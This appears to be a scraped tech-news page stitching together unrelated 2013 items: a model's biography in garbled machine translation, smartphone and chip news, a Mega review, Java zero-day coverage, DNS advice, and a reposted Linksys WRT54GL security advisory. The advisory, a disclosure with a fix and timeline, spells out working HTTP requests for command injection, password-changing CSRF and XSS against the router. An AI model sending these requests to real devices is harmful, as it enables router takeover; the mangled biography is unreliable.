Sara Sampaio

Sara Pinto Sampaio (Birth, July 21 of 1991) is a model female Portuguese. He won a Golden Globe Portuguese in 2011 and 2012 as "Best Female Model" in your country. It is one of the most prestigious Portuguese models and has appeared on the cover of major magazines worldwide distribution.

It became famous after winning the Pantene Hair Contest 2007. Has photographed for Vogue and Glamour and for Elle and Biba French. In 2012 was also the cover of April's Vogue Portuguese and was chosen to be the image of the international campaign Calzedonia Summer 2012 Mar, whose photographs were taken by Raphael Mazzucco in Greece and Jamaica. In 2013 appears the first year's edition of the magazine GQ Portugal , where it is presented as the "eighth wonder of the world".

Read More

Exynos 5 Octa Upcoming Galaxy S4

Samsung's upcoming Galaxy S4 handset could be powered by the company's new Exynos 5 Octa system-on-chip processor, if new leaked details are correct.

The processor, which is also believed to power the soon-to-be-released Galaxy Note 3 phablet device, isn't an eight-core chip in the traditional sense: as well as four high-performance processing cores based on ARM's Cortex-A15 design, it apparently includes a further four Cortex-A7 cores processing cores that offer less power but require less energy to operate. When the smartphone is running a processor-intensive application, such as a 3D game, the high-performance cores activate; when the phone is being used for less intensive work, such as making a call or listening to music, the high-performance cores are deactivated and the low-power cores used instead. However, only one set of four cores can be active at once.

The design is part of a system ARM calls big.LITTLE, similar to the 'companion core' concept found in Nvidia's Tegra 3 and 4 processors, but Samsung is the first company to attempt to launch an eight-core device into smartphones and tablets.

According to details posted to the AnTuTu Benchmark site, the Samsung Galaxy S4 will feature the model number GT-I9500. No other details were made public by the benchmark results, but previous rumours claim that the handset may feature a new 4.99in display with a Full HD 1080p resolution, 2GB of RAM and a high-resolution 13-megapixel rear-facing camera. The handset is expected to launch with Android 4.2 Jelly Bean as its operating system, becoming one of the first non-Nexus devices to feature the latest build of Google's popular mobile platform.

Thus far, Samsung has not commented on the rumours surrounding its Galaxy S4 handset plans. - source

Read More

Tegra 4 GPU will outperform the iPad 4's A6X

While few people seem to care about processors speeds on the desktop, it's a hot topic when it comes to mobile processors, and Nvidia has just raised the stakes with its new Tegra 4 processor.

The Tegra 4 has at its heart 72 custom Nvidia GeForce GPU cores, giving it six-times the graphics processing power of the current Tegra 3. Backing up the GPU is a new quad-core variant of ARM's Cortex-A15 CPU, a chip that Nvidia claims "delivers 2.6x faster Web browsing and breakthrough performance for apps."

According to AnandTech, the Tegra 4 processor will have six-times the arithmetic logic units (ALUs) that are present in the Tegra 3. If it is assumed that the Tegra 4 GPU cores will operate at 520 MHz -- which is the fastest that the Tegra 3 could go -- this means that the GPU will be capable of 74.8 GFLOPS (billion FLoating-point Operations Per Second) compared to the 71.6 GFLOPS that the PowerVR SGX 554MP4 inside Apple's A6X.

At CES 2013 Nvidia made the assertion that the Tegra 4 will be faster than the A6X both in 3D games and in GLBenchmark, but didn't provide further details on the matter.

This week, GLBenchmark results claiming to show Tegra 4 performance were leaked to the Web, but it appears that these are either fake or relate to prototype versions of the Tegra 4 running at much lower clock speeds.

While this seems to give Nvidia an advantage over Apple, the glory could be short-lived. Imagination Technologies, makers of the PowerVR GPU inside many smartphones and tablets -- including the iPhone and iPad -- have announced that its sixth-generation graphics core can deliver "20x or more" the performance of current-generation hardware while at the same time being five times more efficient.

Things are really starting to heat up in the mobile sector. - source

Read More

Xperia Z Become The Best Camera Phone

Everybody’s getting completely addicted to the cameras on their smartphones, causing phone makes to enter a huge megapixel war. While the battle raged on all of 2012 between the iPhone 5 and Galaxy S3 in terms of camera power, 2013’s got a new gadget that promises to steal the show – the Xperia Z.

When we analyzed the camera power of the Xperia Z against that of the iPhone 5 and Galaxy S3, we surely were amazed at what this 5-inch monster can do! For starters, it does have a higher resolution of 13 MP while the other two phones have 8MP cameras on board. But, it’s not just the higher megapixel count that makes the Xperia Z’s camera stand out.

What sets it apart is Sony’s special Exmos RS sensor that gives it a much more advanced sensor, capable of reproducing high quality images. Another interesting feature in the Xperia Z’s camera is its video HDR mode, which lets you record videos too in High Dynamic Range mode – a first definitely for phone cameras.

The Xperia Z also has a Superior Auto mode, which users of Sony digital cameras would find familiar. Also included is the Sweep Panorama mode, which makes clicking panoramic images literally a breeze!

You can adjust many features of the camera, including the resolution, white balance, timer, ISO, flash, exposure and some others like HDR, smile shutter, and even focus mode. When you’ve got it in your hands, you can easily be forgiven for thinking of it as a digital camera and not just a phone camera.

We also love the album app in the Xperia Z, which organizes thumbnail previews of the images you’ve clicked very nicely. Organized by date, it lets you browse through your picture library so easily, finding images becomes so much faster on this device. You can also display the images on a globe, thanks to the geotag feature, which will then pin your images based on the locations they were clicked in. - source

Read More

50GBs Free Cloud Storage From Mega

Hungry for 5Gbs of your free Cloud Storage that have offered by Google drive, Microsoft skydrive, Dropbox, Mediafire and others? Not anymore, Mega has just recently lunch of free cloud storage offering a huge data cloud storage that is ten (10) times bigger than those previous above mention.

Who wouldn't want 50GBs of free Internet storage? Dropbox is all fine and well, but it starts with a mere 2GBs of free space. Kim Dotcom's newly launched Mega cloud storage service with its free 50GBs of storage sounds much better, but how well does it really work? Let me open by saying it's a long, long way from perfect.

To get your free 50GBs of storage, you first must register your account with a valid e-mail address. Once you've done this—and it may take a while since the system is heavily over-burdened—you'll get a link to use to login to Mega.

You can just any Web browser to access your new storage so long as its actively supporting JavaScript. Mega recommends Chrome, but I was also able to use it with Firefox. However, Internet Explorer 10, Windows 8's default browser, is known to freeze up after uploading appoximately 100MBs of files.

Even with Chrome, I found the site often locked up on me. In particular, Mega promises that, if you don't close your current browser session, you can restart interrupted uploads and downloads . It didn't work for me. I will say, however, that getting an estimated upload time of infinity was one of the more amusing error messages I've ever seen.

Once you make it into Mega you're presented with a typical file/folder style display. You can upload both single files or folders. You can also download files at the same time as you're uploading others. Unlike more sophisticated cloud storage services, such as Dropbox, Mega's storage won't integrate with your file system. You can only access your files via a Web browser.

That may change soon. Mega is opening its application programming interface (API). The functionality already appears to be there to integrate Mega with your PC's existing file system.

For now, you can either drag and drop files into Mega from your file manager or use the site's upload buttons. If you're using Chrome, you can also try to drag and drop directories. Regardless of how you do it, be ready for long waits. In these early days, Mega is anything but fast.

Once loaded, you can right-click on file to get a link for it or download, rename; move, copy, delete, or reload it. You will also be able to drag and drop your files into new Mega folders.

Mega does indeed appear to give you 50GBs of free storage. Your files, however, may not be the files that are actually stored on the cloud.

To quote from Mega's terms of service, "Our service may automatically delete a piece of data you upload or give someone else access to where it determines that that data is an exact duplicate of original data already on our service. In that case, you will access that original data." So, for example, if you 'saved' a copy of Star Wars to Mega and someone else had uploaded the exact same video only his copy would be saved and when you accessed "your" copy, you'd really watching "his" copy.

There's nothing new about this of course. Apple uses the method with iTunes Match as does Amazon with its Cloud Player service. What we don't know, however, is how Mega does it because Mega also only stores encrypted files and the company states that it doesn't have access to your encryption key.

To be exact, when you get a Mega account, you choose a password. This password also serves as your symmetric encryption key. By symmetric Mega means you use the same Advanced Encryption Standard (AES) 128-bit key that's been derived from your password to both encrypt and decrypt your files and folders. This coding and decoding is all done on your computer.

Indeed Mega, doesn't keep your password/encryption key at all. If you lose your password, or it's hacked, Mega can't help you. Your files will be, for all practical purposes, toast. Even if you know for a fact that you'll never forget your password, "password," you may find that you can't log in anyway. While it didn't happen to me I've heard reports of users finding they couldn't log back in even though they knew they were using the right, simple password.

So, how can Mega know that your files are an exact duplicate of another user's? We don't know. There are many theories, such as these discussed on Ycombinator, but, for now, we're all just speculating.

Personally, I take Mega's warning about the safety of your data seriously: "You must maintain copies of all data stored by you on our service. We do not make any guarantees that there will be no loss of data or the services will be bug free."

That aside, if you want to share your files privately with someone, Mega uses far stronger encryption: 2,048-bit AES asymmetric encryption. This means there's both a public and private key pair. With this you should be able to securely share files with friends.

You can also use this method to share files directories with other users who also have Mega accounts. If you choose to share files or directories this way, you also control how much access your colleagues have to your shared data.

Of course, you shoud be able to share files with URLS that have your password embedded in them. With these, anyone who has the link can download the file.

I say "should" because once you start trying to use Mega you'll quickly find that the system is totally swamped. Dotcom is well aware of the problem. He tweeted, "The massive global PR around the #Megalaunch is simply to big to handle for our start-up. I apologize for poor service quality." He then added, "We are working 24/7 and expect normal operations within 48 hours. Lesson learned... No fancy launch event for Megabox ;-)"

So, exactly how overwhelmed are they? "If I would tell you how many signups we had since the launch you wouldn't believe it. I can't believe it. So, I won't tell you." Maybe Dotcom can't but what I can tell you is that, at best, I was seeing upload speeds of less than 1-Kilobit per second from my 5-Megabit per second Charter cable Internet connection. A lot of other basic functionality, such as simply being able to obtain the URL of an uploaded file, frequently failed for me.

The long and short of it is that Mega may prove to be a useful, free service... someday. For now, it's very much a work in progress. If you want good, free, and reliable cloud storage today, go to Dropbox, Google Drive, or Microsoft SkyDrive. If you have to have 50GBs of free storage, check out MediaFire's offering. But as for Mega, you'll be better off holding off for at least a week before trying it. You'll be glad you waited. - source

Read More

Samsung Galaxy S3 Vs Apple iPhone5 Vs LG Optimus G

The iPhone 5 has failed to make as big a mark as its predecessors, and there’s possibly worse news in store for Apple. 2013 has seen a host of brand new smartphones being launched, even though the year has barely begun. The LG Optimus G, LG’s latest flagship phone, is one such device that could also steal away some of the iPhone 5’s spotlight. So we decided to pit the Optimus G against the iPhone 5 and the current favorite flagship, the Samsung Galaxy S3, to see if it stood a chance in the market.

From the outside: The iPhone 5’s design might get a tad boring, considering it’s been the same since iPhone 4. At first glance, you might not even notice anything different – with its familiar brushed aluminum casing. But, we have to agree, it does give the iPhone a classy and expensive look. We love the Galaxy S3’s rounded pebble-like exterior – it gives it a different look. On the other hand, the Optimus G manages to make its mark even though it doesn’t look as classy as the iPhone – we especially love its Crystal Reflection rear panel.

The iPhone 5 has a 4-inch Retina LCD display with a resolution of 1136X640 pixels. We’ve obviously found the screen size far too small, especially in the age of 5-inch phablets. The Optimus G has a larger 4.7-inch display with a resolution of 768X1280 pixels. The Galaxy S3 has the largest 4.8-inch display among these three, but it has the least resolution of just 306 ppi, which negates the beauty of the large screen. LG seems to have struck a good balance between screen size and resolution on the Optimus G.

On the inside: The iPhone 5 is powered by a 1.3 GHz dual-core Apple A6 processor and 1 GB of RAM. The Galaxy S3 has a slightly more powerful 1.4 GHz processor but only 1 GB of RAM. The Optimus G’s got more power, with its 1.5 GHz quad-core Snapdragon S4 processor and 2 GB of RAM. Both the Galaxy S3 and Optimus G have 32 GB of internal storage as well as a microSD card slot for those who need more storage space – a big disappointment in the iPhone 5.

The OS: We can’t say anything bad about the iOS 6 that’s running the iPhone 5, which has the largest number of apps to choose from. Samsung’s Galaxy S3 runs on Android 4.1 Jelly Bean, which is a massive improvement over the previous ICS version. A major disappointment with the Optimus G is that it runs on Android 4.0. We wonder why LG couldn’t put in the Jelly Bean version instead.

Camera: In terms of front-facing cameras, there isn’t much difference between the iPhone 5 and the Optimus G – the iPhone 5 has a 1.2 MP camera while the Optimus G has a 1.3 MP camera. But the Galaxy S3 has a 1.9 MP front-facing camera, the best among these three. When it comes to the main camera, we love the Optimus G’s13 MP camera over the iPhone 5’s and the Galaxy S3’s 8 MP offering.

Battery: The iPhone 5 has a 1440 mAh camera which gives it a talktime of about 8 hours. The Optimus G and the Galaxy S3 are the winners in this category with their 2100 mAh battery and 15 hours of talktime.

Connectivity: All these phones offering LTE as well as 3G connectivity. The Optimus G and the Galaxy S3, in addition to WiFi and Bluetooth, also have NFC capabilities – an important feature missing in the iPhone 5. - source

Read More

Apple ‘cuts order for iPhone5 parts’ on 2013

Apple has slashed orders for the screens used on its iPhone5 because of weak sales while arch-rival Samsung has sold its 100 millionth Galaxy S device, in a sign of changing fortunes in the mobile market.

The iPhone maker has almost halved its order of liquid-crystal display panels from key suppliers, according to the Japanese newspaper the Nikkei.

Apple has told three suppliers, Japan Display, Sharp and LG Display, that it requires fewer screens, after previously requesting as many as 65 million units for the January to March quarter. Japan Display’s plant in Nomi, a key iPhone supplier, is expected to reduce output temporarily by between 70% and 80%, compared with the October to December period.

The iPhone5 is longer and lighter than previous models, but consumers have been underwhelmed and there have been glitches, notably the flawed maps function.

Apple has dominated the smartphone market with iPhone since its launch in 2007, but Samsung has caught up in recent years, following the launch of the Galaxy S series in May 2010. Last year, the latest model, the Galaxy S III, helped the South Korean firm to leapfrog its US rival to become the world’s top-selling smartphone manufacturer.

Sales of Samsung’s Galaxy S series have reached 100 million in under three years — faster than Apple’s iPhone, which took nearly four years.

Apple’s share price has tumbled by a quarter since September when iPhone5 debuted. In contrast, Samsung’s shares powered to a new record last week.

Both companies are benefiting from the mobile boom as consumers prefer smartphones and tablets to the traditional desktop or personal computer. Research firm Gartner reported today that global sales of PCs slumped 5% in the last three months, to 90.3 million. Gartner said the launch of “compelling low-cost tablets” — such as the Google Nexus and Amazon Kindle Fire — was helping to drive the shift from PC to tablet. - source

Read More

How to Disabled Java from the Browser

Below are instructions for disabling Java from whatever Web browser you may use to surf the Web. These instructions were originally posted as a how-to in response to this piece: Zero-Day Java Exploit Debuts in Crimeware.

Update, Jan 10, 10:35 a.m. ET: The latest version of Java 7 (Update 10) includes a feature that makes it simpler to unplug Java from the browser. Oracle has posted instructions on how to use this feature on Windows here. Also, KrebsOnSecurity just published a comprehensive Q&A that seeks to answer some of the most frequently asked questions about the scope of this vulnerability, and steps that users can take to protect themselves.

Original post:

For Windows users:

Mozilla Firefox: From the main menu select Add-ons, and then disable any plugins with the word “Java” in them. Restart the browser.

Google Chrome: Click the wrench icon in the upper right corner of the browser window, then select Settings. In the search results box to the right in the next screen, type “Java”. A box labeled “Content settings” should be highlighted. Click that, and then scroll down to the Plug-ins section. Click the “Disable individual plug-ins” link, find Java in the list, and click the disable link next to it.

Internet Explorer:

Apparently, getting Java unplugged from Internet Explorer is not straightforward. The U.S. Computer Emergency Response Team (USCERT) lists the following steps, which may or may not completely remove Java from IE:

In the Windows Control panel, open the Java item. Select the “Java” tab and click the “View” button. Uncheck “enabled” for any JRE version listed. Note that this method may not work on Vista or newer systems. As an alternative, you may use one of the following techniques:

Click the start key and type “regedit” in the search box. Double-click the regedit program file when it appears.

- Change the HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Plug-in\\UseJava2IExplorer registry value to 0, where is any version of Java on your system. 10.6.2, for example.

If you are running a 32-bit version of Java on a 64-bit platform, you should set the HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\JavaSoft\Java Plug-in\\UseJava2IExplorer registry value to 0.

- Run javacpl.exe as administrator, click the “Advanced” tab, select “Microsoft Internet Explorer” in the “Default Java for browsers” section, and press the space bar to uncheck it. This will properly set the above registry value, despite the option being greyed out.

US-CERT has some additional suggestions for removing Java from IE if the above steps do not do the trick. See their advisory for more details.

For Mac users:

Safari: Click Preferences, and then the Security tab (uncheck “Enable Java”).

Google Chrome: Open Preferences, and then type “Java” in the search box. Scroll down to the Plug-ins section, and click the link that says “Disable individual plug-ins.” If you have Java installed, you should see a “disable” link underneath its listing.

Firefox: Click Tools, Add-ons, and disable the Java plugin(s). - source

Read More

50% of all website exploited due to Java's vulnerable

Oracle Corp. said Monday it has released a fix for the flaw in its Java software that raised an alarm from the U.S. Department of Homeland Security last week. Even after the patch was issued, the federal agency continued to recommend that users disable Java in their Web browsers.

"This and previous Java vulnerabilities have been widely targeted by attackers, and new Java vulnerabilities are likely to be discovered," DHS said Monday in an updated alert published on the website of its Computer Emergency Readiness Team. "To defend against this and future Java vulnerabilities, consider disabling Java in Web browsers until adequate updates are available."

The alert follows on the department's warning late Thursday. Java allows programs to run within websites and powers some advertising networks. Users who disable Java may not be able to see portions of websites that display real-time data such as stock prices, graphical menus, weather updates and ads.

Vulnerability in the latest version, Java 7, was "being actively exploited," the department said.

Java 7 was released in 2011. Oracle said installing its "Update 11" will fix the problem.

Security experts said that special code to take advantage of the weakness is being sold on the black market through so-called "Web exploit packs" to Internet abusers who can use it to steal credit card data, personal information or cause other harm.

The packs, sold for upwards of $1,500 apiece, make complex hacker codes available to relative amateurs. This particular flaw even enables hackers to compromise legitimate websites by taking over ad networks. The result: users are redirected to malicious sites where damaging software can be loaded onto their computers.

The sale of the packs means malware exploiting the security gap is "going to be spread across the Internet very quickly," said Liam O'Murchu, a researcher with Symantec Corp. "If you have the opportunity to turn it off, you should."

Oracle said it released two patches — to address the flaw highlighted by the government, as well as another flaw that the government said was "different but equally severe."

As well, the patches set Java's default security level to "high" so that users will automatically be shown a prompt and given a chance to decline malicious software before it loads onto their computers.

Disabling Java completely in browsers has a similar effect, however. When websites appear without crucial functions, users can click a button to turn Java back on.

Making users aware when Java programs are about to be installed gives users a 50/50 chance of avoiding malware, said Kurt Baumgartner, a senior security researcher with Kaspersky Lab.

Many programmers are avoiding Java altogether, and its use in Web browsers is on the decline, he said.

Kaspersky Lab estimated that last year 50 percent of all website exploitations were due to vulnerabilities in Java. Adobe's Acrobat Reader accounted for another 28 percent of vulnerabilities. - source

Read More

New Java exploit sells for $5000 at black web

For Oracle, it's deja vu all over again.

Just days after it released a patch for a serious security flaw discovered last week in its Java programming language, the software is making headlines again because another previously unpublicized flaw in the program threatens the security of millions of PCs that may still have the application running on it.

Oracle released a fix Sunday for a Java flaw so serious that the U.S. Department of Homeland Security recommended that computer users disable the software unless using it was "absolutely necessary."

That advice was repeated Monday by the department's Computer Emergency Readiness Team (US-CERT) even after the patch was made available to users.

Vulnerablity for sale

Now it's being reported that an enterprising Black Hat is peddling a new Zero Day vulnerability for the latest version of Java (version 7, update 11) to up to two buyers for $5000 each.

Both weaponized and source code versions of the vulnerability were being offered by the seller, according to security blogger Brian Krebs, who discovered the offer on an exclusive cybercrime forum.

Since Krebs discovered the offer, he said, it has been removed from the crime forum, suggesting the seller found his buyers for the exploit.

"To my mind, this should dispel any illusions that people may harbor about the safety and security of having Java installed on an end-user PC without taking careful steps to isolate the program," Krebs wrote.

This latest Java exploit is worse than the last one because no one knows what it is, according to Bogdan Botezatu, senior e-threat analyst with anti-virus software maker Bitdefender.

In the flaw patched Sunday, he explained, the exploit code was identified by security researchers in some popular malware kits. With the latest flaw, it's only known to the seller.

"The current method of exploitation will likely remain unknown for a bigger timeframe, which will also increase the attackers' windows of opportunity," Botezatu said in an email.

Earlier this week, Botezatu noted in a blog that despite the patch pushed by Oracle on Sunday, cyber criminals continued to exploit the vulnerability on unpatched machines to install ransomware on them.

Oracle's security moves

In addition to addressing the Zero Day vulnerability in Sunday's patch, Oracle also boosted Java's security setting to "high" by default. "That means that right now the user has to authorize the execution of Java applets that are not signed with a valid certificate," explained Jaimie Blasco, manager of AlienVault Labs, in an email.

While that move is a great step toward making Java more secure on a browser, Blasco noted, it is far from a panacea for Java's problems.

"In the past, we have seen that the attackers were able to steal a valid certificate to sign malicious code so it won't surprise me if we see this technique being used," he said.

Because Java appears to be riddled with vulnerabilities, Bitdefender's Botezatu recommends Oracle identify the core components of the software and rewrite it from scratch.

No doubt, more than a little rewriting of the software will be done when Oracle releases the next version of Java scheduled for September. - source

Read More

Linksys WRT54GL 1.1 XSS OS Injection

Device Name: Linksys WRT54GL v1.1
Vendor: Linksys/Cisco

============ Vulnerable Firmware Releases: ============

Firmware Version: 4.30.15 build 2, 01/20/2011

============ Device Description: ============

The Router lets you access the Internet via a wireless connection, broadcast at up to 54 Mbps, or through one of its four switched ports. You can also use the Router to share resources such as computers, printers and files. A variety of security features help to protect your data and your privacy while online. Security features include WPA2 security, a Stateful Packet Inspection (SPI) firewall and NAT technology. Configuring the Router is easy using the provided browser-based utility.

Source: http://homesupport.cisco.com/en-us/support/routers/WRT54GL

============ Shodan Torks ============

Shodan Search: WRT54GL
=> Results 27190 devices

============ Vulnerability Overview: ============

* OS Command Injection
=> parameter: wan_hostname
=> command: `%20ping%20192%2e168%2e178%2e101%20`

The vulnerability is caused by missing input validation in the wan_hostname parameter and can be exploited to inject and execute arbitrary shell commands. With wget it is possible to upload and execute a backdoor to compromise the device.
You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/OS-Command-Injection-param_wan_hostname.png

POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/index.asp
Authorization: Basic xxxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 734
Connection: close

submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1

=> Change the request method from HTTP Post to HTTP GET makes the exploitation easier:

http://192.168.178.166/apply.cgi?submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1

=> This setting is placed permanent into the configuration and so it gets executed on every bootup process of the device.

* For changing the current password there is no request to the current password

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.


POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/Management.asp
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-Length: 299

submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=pwnd&http_passwdConfirm=pwnd&_http_enable=1&web_wl_filter=0&remote_management=1&http_wanport=8080&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

* CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management:

http:///apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=pwnd1&http_passwdConfirm=pwnd1&_http_enable=1&web_wl_filter=0&remote_management=1&http_wanport=8080&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

* reflected XSS

=> parameter: submit_button

Injecting scripts into the parameter submit_button reveals that this parameter is not properly validated for malicious input.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/reflected-XSS-01.png

POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/Wireless_Basic.asp
Authorization: Basic xxxx=
Content-Type: application/x-www-form-urlencoded
Content-Length: 155

submit_button=Wireless_Basic'%3balert('pwnd')//&action=Apply&submit_type=&change_action=&next_page=&wl_net_mode=mixed&wl_ssid=test&wl_channel=6&wl_closed=0

* stored XSS (Access Restrictions -> Richtliniennamen eingeben (place the XSS) -> Zusammenfassung (Scriptcode gets executed)

=> parameter: f_name

Injecting scripts into the parameter f_name reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods like CSRF for inserting the malicious JavaScript code.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/stored-XSS-Filters.png

=> Change the request methode from HTTP Post to HTTP GET makes the exploitation easier:


http://192.168.178.166/apply.cgi?submit_button=Filters&change_action=&submit_type=save&action=Apply&blocked_service=&filter_web=&filter_policy=&f_status=0&f_id=1&f_status1=disable&f_name=123">&f_status2=allow&day_all=1&time_all=1&allday=&blocked_service0=None&blocked_service1=None&host0=&host1=&host2=&host3=&url0=&url1=&url2=&url3=&url4=&url5=

============ Solution ============

Upgrade your router to the latest firmware version with fixes for XSS and OS Command Injection vulnerabilities.

Fixed Version: Ver.4.30.16 (Build 2)
Available since 10.01.2013

Download: http://homesupport.cisco.com/en-eu/support/routers/WRT54GL

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-001
Twitter: @s3cur1ty_de

============ Time Line: ============

September 2012 - discovered vulnerability
03.10.2012 - Contacted Linksys and give them detailed vulnerability details
03.10.2012 - Linksys responded with a case number
11.10.2012 - Status update from Linksys
23.10.2012 - Linksys requested to sign the Beta Agreement for testing the Beta Firmware
29.10.2012 - Send the Beta Agreement back
29.10.2012 - Linksys gives access to the new Beta Firmware
30.10.2012 - Checked the new firmware and verified that the discovered XSS and OS Command Injection vulnerabilities are fixed
30.10.2012 - Linksys responded that there is no ETA of the new firmware
17.01.2013 - Linksys informed me about the public release of mostly fixed version (XSS, OS Command Injection fixed)
18.01.2013 - public release
===================== Advisory end =====================

Read More

Using OpenDNS/Google DNS is Bad Idea?

Think you're getting faster performance by using Google DNS or OpenDNS? Think again -- especially if you're outside the US.

A post at TUAW today recommends you change your DNS provider for faster performance. If you are located outside the US -- like I am, and like most APC readers are -- this is a bad idea. I only discovered why after experiencing slow download speeds for several months.

Like other tech enthusiasts, I jumped on the opportunity to switch my computer's domain name server settings away from my ISP's defaults to -- I assumed -- the much larger and faster Google DNS servers at 8.8.8.8 and 8.8.4.4 when they were first announced.

If you're not familiar with what exactly DNS servers do, they translate the web address you type into your browser into the actual IP address of the internet server you're connecting to at the other end. For example, a DNS server will convert "apcmag.com" typed into your browser address bar into "125.7.5.1", which is the IP address of our server at Macquarie Telecom's datacentre.

DNS servers can be one cause (among many) of slowness in your web browsing, if your ISP's DNS server is overloaded and responding slowly -- you may experience a delay of seconds each time you go to a web address that your computer hasn't seen recently (and therefore has to connect to a DNS server to find out the correlating IP address).

This is one of the problems that third-party public DNS providers like Google DNS and OpenDNS are supposed to fix -- faster, more reliable lookups.

However, it was Simon Hackett, CEO of Internode, who I bumped into at a function who warned me off using third party DNS servers located overseas, such as Google DNS or OpenDNS. (By the way, if I've got any of the technical details wrong in this article, it's much more likely to be my fault than Simon's...!)

The key reason they're bad is that they stuff up your computer's ability to find the closest Akamai server to you. Akamai is the worldwide system which places massive file servers inside ISP data centres worldwide -- so that when you download a big file like a Windows or Mac OS X update, or a TV show or movie from iTunes, it downloads from a server that's very close to you, and therefore pumps down your line as fast as your ADSL2+ can handle. (The primary selling point of Akamai is that it avoids server overload when everyone tries to download something at once, but a secondary selling point is that you're downloading a file from a local server inside your ISP or at least in your country, so that the trip between the file server and you is as short/fast as possible.)

If you use a US-based DNS server, your closest Akamai cache will instead be chosen as being in the US, and you'll get crummy download speeds as your file trickles over the international link.

In my case, this meant that iTunes downloads were coming down at a couple of hundred kilobytes per second, rather than the 1.9MB/s I was accustomed to before I changed my DNS servers to Google DNS and OpenDNS.

Don't get me wrong -- there are some distinct advantages to using reliable servers from companies that specialise in providing DNS, like much faster refresh of their DNS records when new domains are registered, or websites change their IP addresses, DNS-level blocking of known phishing sites and so on.

But when they claim you'll get faster speed by using them, they're conveniently forgetting to mention that if you're not located in the US, they could badly slow down your speed when downloading from distributed caches like Akamai.

Admittedly, part of the problem is the design of Akamai -- it is, to an extent, a 'hack' of the DNS system (not in the illegal sense; but in the sense that they're using the DNS system in a way it was not quite designed for initially.) I have contacted Akamai's senior PR people twice and asked if they're investigating any way of mitigating the problem when people use DNS servers outside their local geography, but I haven't heard back.

Of course, if Google DNS, OpenDNS or other public DNS providers put servers into Australia, the problem would be largely gone. But until they do, my advice is to stick with the DNS provided by your ISP. To their credit, OpenDNS is reasonably up-front about this problem (though it's not something they advertise on their homepage, so most users wouldn't be aware of it.)

